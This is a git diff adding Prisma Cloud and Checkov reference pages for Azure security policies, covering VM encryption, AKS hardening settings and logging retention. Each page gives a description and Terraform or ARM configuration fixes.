diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption.adoc
new file mode 100644
index 000000000..1032dc241
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption.adoc
@@ -0,0 +1,76 @@
+== Azure Windows VM does not enable encryption
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7fec314c-d8db-4e40-bef9-5e1cdd71db5b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py[CKV_AZURE_151]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Enabling encryption for your Azure Windows virtual machine (VM) can help improve the security of your VM and its data.
+Encryption helps protect data by encoding it in such a way that it can only be accessed by authorized users.
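The same condition can be checked against a rendered plan before apply. A rough sketch of a CKV_AZURE_151-style attribute test over `terraform show -json` output; the traversal assumes the standard `planned_values` plan layout, and the function name is hypothetical:

```python
import json

# Hypothetical sketch: walk `terraform show -json` output and flag Windows VMs
# that lack host encryption. Assumes the standard planned_values plan layout.

def unencrypted_windows_vms(plan_json: str) -> list:
    """Flag Windows VMs in a Terraform plan without encryption_at_host_enabled."""
    plan = json.loads(plan_json)
    resources = (plan.get("planned_values", {})
                     .get("root_module", {})
                     .get("resources", []))
    return [r.get("address") for r in resources
            if r.get("type") == "azurerm_windows_virtual_machine"
            and not r.get("values", {}).get("encryption_at_host_enabled", False)]

plan = json.dumps({"planned_values": {"root_module": {"resources": [
    {"type": "azurerm_windows_virtual_machine",
     "address": "azurerm_windows_virtual_machine.pass",
     "values": {"encryption_at_host_enabled": True}},
    {"type": "azurerm_windows_virtual_machine",
     "address": "azurerm_windows_virtual_machine.fail",
     "values": {}},
]}}})
print(unencrypted_windows_vms(plan))  # ['azurerm_windows_virtual_machine.fail']
```

Note that child modules would need the same traversal applied recursively; the sketch only inspects the root module.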
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_windows_virtual_machine
+* *Arguments:* encryption_at_host_enabled
+
+
+[source,go]
+----
+resource "azurerm_windows_virtual_machine" "pass" {
+  name                = "example-machine"
+  resource_group_name = azurerm_resource_group.example.name
+  location            = azurerm_resource_group.example.location
+  size                = "Standard_F2"
+  admin_username      = "adminuser"
+  admin_password      = "P@$$w0rd1234!"
+
+  network_interface_ids = [
+    azurerm_network_interface.example.id,
+  ]
+
+  os_disk {
+    caching              = "ReadWrite"
+    storage_account_type = "Standard_LRS"
+  }
+
+  source_image_reference {
+    publisher = "MicrosoftWindowsServer"
+    offer     = "WindowsServer"
+    sku       = "2016-Datacenter"
+    version   = "latest"
+  }
+
+  encryption_at_host_enabled = true
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/azure-kubernetes-policies.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/azure-kubernetes-policies.adoc
new file mode 100644
index 000000000..1443ba5af
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/azure-kubernetes-policies.adoc
@@ -0,0 +1,49 @@
+== Azure Kubernetes Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-azr-kubernetes-1.adoc[Azure AKS cluster monitoring not enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSLoggingEnabled.py[CKV_AZURE_4]
+|MEDIUM
+
+
+|xref:bc-azr-kubernetes-2.adoc[Azure AKS enable role-based access control (RBAC) not enforced]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py[CKV_AZURE_5]
+|HIGH
+
+
+|xref:bc-azr-kubernetes-3.adoc[AKS API server does not define authorized IP ranges]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py[CKV_AZURE_6]
+|LOW
+
+
+|xref:bc-azr-kubernetes-4.adoc[Azure AKS cluster network policies are not enforced]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSNetworkPolicy.py[CKV_AZURE_7]
+|LOW
+
+
+|xref:bc-azr-kubernetes-5.adoc[Kubernetes dashboard is not disabled]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py[CKV_AZURE_8]
+|LOW
+
+
+|xref:ensure-that-aks-enables-private-clusters.adoc[AKS is not enabled for private clusters]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py[CKV_AZURE_115]
+|LOW
+
+
+|xref:ensure-that-aks-uses-azure-policies-add-on.adoc[AKS does not use Azure policies add-on]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py[CKV_AZURE_116]
+|LOW
+
+
+|xref:ensure-that-aks-uses-disk-encryption-set.adoc[AKS does not use disk encryption set]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py[CKV_AZURE_117]
+|LOW
+
+
+|===
+
diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1.adoc
new file mode 100644
index 000000000..382d5320a
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1.adoc
@@ -0,0 +1,218 @@
+== Azure AKS cluster monitoring not enabled
+// Azure Kubernetes Service (AKS) cluster monitoring disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| be55c11a-981a-4f34-a2e7-81ce40d71aa5
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSLoggingEnabled.py[CKV_AZURE_4]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The Azure Monitoring service collects and stores valuable telemetry reported by AKS. +This includes memory and processor metrics for controllers, nodes, and containers, as well as logs from the individual containers. +This data is accessible through Azure Log Analytics for the AKS cluster and Azure Monitor instance. +We recommend storing memory and processor metrics from containers, nodes, and controllers. +This enables strong real-time and post-mortem analysis of unknown behaviors in AKS clusters. +//// +=== Fix - Runtime + + +*CLI Command* + + +To enable Azure Monitor for an existing AKS cluster, use the following command: +---- +az aks enable-addons +-a monitoring -n rg-weu-my-cluster -g rg-weu-my-cluster-group +--workspace-resource-id 4ab81b6f-c07d-d174-ef26-f4344bad14a +---- +Use the default Log Analytics workspace: +---- +az aks enable-addons +-a monitoring -n rg-weu-my-cluster -g rg-weu-my-cluster-group +---- +This will take a few moments.
+When complete, you can verify using the show command: +---- +az aks show -n rg-weu-my-cluster -g rg-weu-my-cluster-group +---- +This provides general AKS information, including the following addonProfiles section: + + +[source,shell] +---- +"addonProfiles": { + "omsagent": { + "config": { + "logAnalyticsWorkspaceResourceID": + "/subscriptions/GUID/resourcegroups/defaultresourcegroup-weu/providers + /microsoft.operationalinsights/workspaces/defaultworkspace-GUID-weu" + }, + + "enabled": true + } + +}, +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* log_analytics_workspace_id + + +[source,go] +---- +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_kubernetes_cluster" "example" { + name = "example-aks1" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + dns_prefix = "exampleaks1" + + default_node_pool { + name = "default" + node_count = 1 + vm_size = "Standard_D2_v2" + } + + + addon_profile { + oms_agent { + enabled = true + log_analytics_workspace_id = "workspaceResourceId" + } + + } + + tags = { + Environment = "Production" + } + +} + +output "client_certificate" { + value = azurerm_kubernetes_cluster.example.kube_config.0.client_certificate +} + + +output "kube_config" { + value = azurerm_kubernetes_cluster.example.kube_config_raw +} +---- + + +*ARM Template* + + +* *Resource:* Microsoft.ContainerService/managedClusters +* *Arguments:* logAnalyticsWorkspaceResourceID + + +[source,json] +---- +{ + "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "aksResourceId": { + "type": "string", + "metadata": { + "description": "AKS Cluster Resource ID" + } + + }, + "aksResourceLocation": { + "type": "string", + "metadata": { + "description": 
"Location of the AKS resource e.g. \\"East US\\"" + } + + }, + "aksResourceTagValues": { + "type": "object", + "metadata": { + "description": "Existing all tags on AKS Cluster Resource" + } + + }, + "workspaceResourceId": { + "type": "string", + "metadata": { + "description": "Azure Monitor Log Analytics Resource ID" + } + + } + }, + + "resources": [ + { + "name": "[split(parameters('aksResourceId'),'/')[8]]", + "type": "Microsoft.ContainerService/managedClusters", + "location": "[parameters('aksResourceLocation')]", + "tags": "[parameters('aksResourceTagValues')]", + "apiVersion": "2018-03-31", + "properties": { + "mode": "Incremental", + "id": "[parameters('aksResourceId')]", + "addonProfiles": { + "omsagent": { + "enabled": true, + "config": { ++ "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]" + } + + } + } + + } + } + + ] + +} + +", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2.adoc new file mode 100644 index 000000000..e2e42d26a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2.adoc @@ -0,0 +1,60 @@ +== Azure AKS enable role-based access control (RBAC) not enforced +// Azure Kubernetes Service (AKS) role-based access control (RBAC) not enforced + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3b6626af-9601-4e99-ace5-7197cba0d37d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py[CKV_AZURE_5] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +AKS can be configured to use Azure Active Directory (AD) and Kubernetes Role-based Access Control (RBAC). 
+RBAC is designed to work on resources within your AKS clusters. +With RBAC, you can create a role definition that outlines the permissions to be applied. +A user or group is then assigned this role definition for a particular scope, which could be an individual resource, a resource group, or across the subscription. +We recommend you sign in to an AKS cluster using an Azure AD authentication token and configure Kubernetes RBAC. +This will limit access to cluster resources based on a user's identity or group membership. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* role_based_access_control_enabled + + +[source,go] +---- +resource "azurerm_kubernetes_cluster" "pike" { +... ++ role_based_access_control_enabled = true +... +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3.adoc new file mode 100644 index 000000000..f45eb9e6d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3.adoc @@ -0,0 +1,185 @@ +== AKS API server does not define authorized IP ranges +// Azure Kubernetes Service (AKS) API server does not define authorized IP address range + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 40bb8745-0b6c-4db4-8793-7b1d5bc9afa7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py[CKV_AZURE_6] + +|Severity +|LOW + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The AKS API server receives requests to perform actions in the cluster, for example to create resources and scale the number of nodes. +The API server provides a secure way to manage a cluster. 
+To enhance cluster security and minimize attacks, the API server should only be accessible from a limited set of IP address ranges. +Authorized IP ranges allow only defined IP address ranges to communicate with the API server. +A request made to the API server from an IP address that is not part of these authorized IP ranges is blocked. +//// +=== Fix - Runtime + + +*CLI Command* + + +When you specify a CIDR range, start with the first IP address in the range. + + +[source,shell] +---- +az aks create \ + --resource-group myResourceGroup \ + --name myAKSCluster \ + --node-count 1 \ + --vm-set-type VirtualMachineScaleSets \ + --load-balancer-sku standard \ + --api-server-authorized-ip-ranges 73.140.245.0/24 \ + --generate-ssh-keys +---- + +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* api_server_authorized_ip_ranges - (Optional) The IP ranges to allow for incoming traffic to the masters. + + +[source,go] +---- +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + +resource "azurerm_kubernetes_cluster" "example" { + ... ++ api_server_authorized_ip_ranges = ["192.168.0.0/16"] + ... 
+} + +output "client_certificate" { + value = azurerm_kubernetes_cluster.example.kube_config.0.client_certificate +} + +output "kube_config" { + value = azurerm_kubernetes_cluster.example.kube_config_raw +} +---- + + +*ARM Templates* + + +* *Resource:* Microsoft.ContainerService/managedClusters +* *Arguments:* apiServerAuthorizedIPRanges + + +[source,go] +---- +{ + "name": "string", + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2019-06-01", + "location": "string", + "tags": {}, + "properties": { + "kubernetesVersion": "string", + "dnsPrefix": "string", + "agentPoolProfiles": [ + { + "count": "integer", + "vmSize": "string", + "osDiskSizeGB": "integer", + "vnetSubnetID": "string", + "maxPods": "integer", + "osType": "string", + "maxCount": "integer", + "minCount": "integer", + "enableAutoScaling": "boolean", + "type": "string", + "orchestratorVersion": "string", + "availabilityZones": [ + "string" + ], + "enableNodePublicIP": "boolean", + "scaleSetPriority": "string", + "scaleSetEvictionPolicy": "string", + "nodeTaints": [ + "string" + ], + "name": "string" + } + ], + "linuxProfile": { + "adminUsername": "string", + "ssh": { + "publicKeys": [ + { + "keyData": "string" + } + ] + } + }, + "windowsProfile": { + "adminUsername": "string", + "adminPassword": "string" + }, + "servicePrincipalProfile": { + "clientId": "string", + "secret": "string" + }, + "addonProfiles": {}, + "nodeResourceGroup": "string", + "enableRBAC": "boolean", + "enablePodSecurityPolicy": "boolean", + "networkProfile": { + "networkPlugin": "string", + "networkPolicy": "string", + "podCidr": "string", + "serviceCidr": "string", + "dnsServiceIP": "string", + "dockerBridgeCidr": "string", + "loadBalancerSku": "string" + }, + "aadProfile": { + "clientAppID": "string", + "serverAppID": "string", + "serverAppSecret": "string", + "tenantID": "string" + }, + + "apiServerAuthorizedIPRanges": [ + "string" + ] + }, + "identity": { + "type": "string" + }, + "resources": [] +} +---- \ 
No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4.adoc new file mode 100644 index 000000000..d4480ba9d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4.adoc @@ -0,0 +1,63 @@ +== Azure AKS cluster network policies are not enforced +// Azure Kubernetes Service (AKS) cluster network policies not enforced + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 61623d0c-5208-48b2-b320-1d6eb284e61d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSNetworkPolicy.py[CKV_AZURE_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Network policy options in AKS include two ways to implement a network policy. +You can choose between Azure Network Policies or Calico Network Policies. +In both cases, the underlying controlling layer is based on Linux IPTables to enforce the specified policies. +Policies are translated into sets of allowed and disallowed IP pairs. +These pairs are then programmed as IPTable rules. +The principle of least privilege should be applied to how traffic can flow between pods in an AKS cluster. +We recommend you select a preferred network policy framework and enforce granular usage-based policies on the architecture and business logic of your applications. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* network_profile.network_policy + + +[source,go] +---- +resource "azurerm_kubernetes_cluster" "pike" { +... + network_profile { + network_plugin = "azure" ++ network_policy = "azure" + } + +... 
+} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5.adoc new file mode 100644 index 000000000..fb69f97d8 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5.adoc @@ -0,0 +1,95 @@ +== Kubernetes dashboard is not disabled +// Kubernetes dashboard enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aac73615-2690-46ff-869f-c868e08ac128 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py[CKV_AZURE_8] + +|Severity +|LOW + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The Terraform provider for Azure provides the capability to disable the Kubernetes dashboard on an AKS cluster. +This is achieved by providing the Kubernetes dashboard as an AKS add-on like the Azure Monitor for containers integration, AKS virtual nodes, or HTTP application routing. +The dashboard add-on is disabled by default for all new clusters created on Kubernetes 1.18 or greater. +In 2018 Tesla was hacked after its Kubernetes dashboard was left open to the internet. +Hackers browsed around and found credentials, eventually managing to deploy pods running bitcoin mining software. +We recommend you disable the Kubernetes dashboard to prevent the need to manage its individual access interface, eliminating it as an attack vector. +//// +=== Fix - Runtime + + +*CLI Command* + + +---- +az aks disable-addons -g myRG -n myAKScluster -a kube-dashboard +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* kube_dashboard (required): Is the Kubernetes Dashboard enabled? + + +[source,go] +---- +... 
+ addon_profile { + kube_dashboard { + enabled = false + } + + } +... +---- + + +*ARM Templates* + + +* *Resource:* Microsoft.ContainerService/managedClusters +* *Arguments:* kubeDashboard + + +[source,json] +---- +... + "addonProfiles": { + "kubeDashboard": { + "enabled": false + } + + }, +... +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters.adoc new file mode 100644 index 000000000..2d7b64c67 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters.adoc @@ -0,0 +1,55 @@ +== AKS is not enabled for private clusters +// Azure Kubernetes Service (AKS) disabled for private clusters + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 752df2ea-d7a3-4dc6-bac1-ec0a8379e86d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py[CKV_AZURE_115] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable the private cluster feature for your Azure Kubernetes Service cluster to ensure network traffic between your API server and your node pools remains on the private network only. +This is a common requirement in many regulatory and industry compliance standards. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* private_cluster_enabled + + +[source,go] +---- +resource "azurerm_kubernetes_cluster" "example" { + ... 
+ + + private_cluster_enabled = true +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on.adoc new file mode 100644 index 000000000..e111f24f2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on.adoc @@ -0,0 +1,58 @@ +== AKS does not use Azure policies add-on +// Azure Policy Add-on for Azure Kubernetes Service (AKS) not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b09005ec-87f5-47ce-bdff-3480eee73931 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py[CKV_AZURE_116] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Policy Add-on for AKS extends Gatekeeper v3, an admission controller webhook for Open Policy Agent (OPA), to apply at-scale enforcements and safeguards on your clusters in a centralized, consistent manner. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* addon_profile.azure_policy.enabled + + +[source,go] +---- +resource "azurerm_kubernetes_cluster" "example" { + ... 
++ addon_profile { ++ azure_policy { ++ enabled = true + } + + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set.adoc new file mode 100644 index 000000000..6b3156df5 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set.adoc @@ -0,0 +1,55 @@ +== AKS does not use disk encryption set +// Azure Kubernetes Service (AKS) does not use disk encryption set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2b3fa957-1875-4d35-b4b1-2355f04f6ab1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py[CKV_AZURE_117] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Disk encryption is a security measure that encrypts the data on a disk to protect it from unauthorized access or tampering. +When disk encryption is enabled for AKS, it encrypts the data on the disks that are used by the nodes in your cluster. +This can help to protect your data from being accessed or modified by unauthorized users, even if the disks are physically stolen or the data is accessed from an unauthorized location. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* disk_encryption_set_id + + +[source,go] +---- +resource "azurerm_kubernetes_cluster" "example" { + ... 
+ + disk_encryption_set_id = "someId" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/azure-logging-policies.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/azure-logging-policies.adoc new file mode 100644 index 000000000..f45587c07 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/azure-logging-policies.adoc @@ -0,0 +1,69 @@ +== Azure Logging Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-logging-1.adoc[Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py[CKV_AZURE_12] +|MEDIUM + + +|xref:bc-azr-logging-2.adoc[Azure SQL Server auditing policy is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerAuditingEnabled.py[CKV_AZURE_23] +|HIGH + + +|xref:bc-azr-logging-3.adoc[Azure SQL Server audit log retention is not greater than 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_24] +|HIGH + + +|xref:enable-requests-on-storage-logging-for-queue-service.adoc[Azure storage account logging for queues is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py[CKV_AZURE_33] +|MEDIUM + + +|xref:ensure-audit-profile-captures-all-activities.adoc[Azure Monitor log profile does not capture all activities] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileCategories.py[CKV_AZURE_38] +|LOW + + +|xref:ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc[Azure storage account logging setting for blobs is disabled] +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml[CKV2_AZURE_21] +|LOW + + +|xref:ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc[Azure storage account logging setting for tables is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml[CKV2_AZURE_20] +|LOW + + +|xref:ensure-that-app-service-enables-failed-request-tracing.adoc[App service does not enable failed request tracing] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py[CKV_AZURE_66] +|LOW + + +|xref:ensure-that-app-service-enables-http-logging.adoc[App service does not enable HTTP logging] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py[CKV_AZURE_63] +|LOW + + +|xref:ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc[Azure Storage account container storing activity logs is publicly accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml[CKV2_AZURE_8] +|MEDIUM + + +|xref:set-activity-log-retention-to-365-days-or-greater.adoc[Activity Log Retention should not be set to less than 365 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py[CKV_AZURE_37] +|MEDIUM + + +|xref:tbdensure-that-app-service-enables-detailed-error-messages.adoc[App service disables detailed error messages] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py[CKV_AZURE_65] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1.adoc 
b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1.adoc new file mode 100644 index 000000000..05153636f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1.adoc @@ -0,0 +1,91 @@ +== Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days +// Azure Network Watcher Network Security Group (NSG) flow logs retention less than 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09fcb4f7-59f3-4101-a717-d4f5a5235067 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py[CKV_AZURE_12] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Flow logs enable capturing information about IP traffic flowing in and out of network security groups. +Logs can be used to check for anomalies and give insight into suspected breaches. +We recommend your Network Security Group (NSG) Flow Log *Retention Period* is set to greater than or equal to 90 days. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Network Watcher* > * Logs* section. + +. Select the * NSG flow logs* blade. + +. For each Network Security Group in the list: a) Set * Status* to * On*. ++ +b) Set * Retention (days)* to * greater than 90 days*. ++ +c) In * Storage account* select your _storage account_. ++ +d) Click * Save*. 
+ + +* CLI Command* + + +To enable the * NSG flow logs * and set the * Retention (days)* to * greater than or equal to 90 days*, use the following command: +---- +az network watcher flow-log configure +--nsg & lt;NameorID of the Network Security Group> +--enabled true +--resource-group & lt;resourceGroupName> +--retention 91 +--storage-account & lt;NameorID of the storage account to save flow logs> +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_watcher_flow_log +* *Arguments:* days + + +[source,go] +---- +resource "azurerm_network_watcher_flow_log" "test" { + ... ++ retention_policy { ++ enabled = true ++ days = <90 or greater> + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2.adoc new file mode 100644 index 000000000..0017c14e1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2.adoc @@ -0,0 +1,137 @@ +== Azure SQL Server auditing policy is disabled +// Azure SQL Server audit policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8a97eb53-4a04-45d6-9f2d-af3b7eb8317b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerAuditingEnabled.py[CKV_AZURE_23] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The Azure platform allows a SQL server to be created as a service. +Auditing tracks database events and writes them to an audit log in the Azure storage account. +It also helps to maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations. 
